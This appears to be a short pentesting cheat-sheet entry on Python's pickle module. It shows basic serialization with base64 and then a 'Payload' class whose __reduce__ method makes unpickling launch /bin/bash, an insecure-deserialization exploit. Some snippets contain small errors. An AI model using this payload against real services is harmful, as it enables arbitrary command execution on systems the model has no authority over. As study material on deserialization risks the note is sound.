# Pickle

Serializes a Python object into a byte stream an back.
When sending pickled data through a network do base64 encoding first to prevent
special characters to do something unexpected.

```python
import pickle
import base64


text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)
```

## Payload

The following payload can be injected into a pickled object.

```python
import pickle
import os
import base64
class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)
```

* Dump serialized object via

```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
```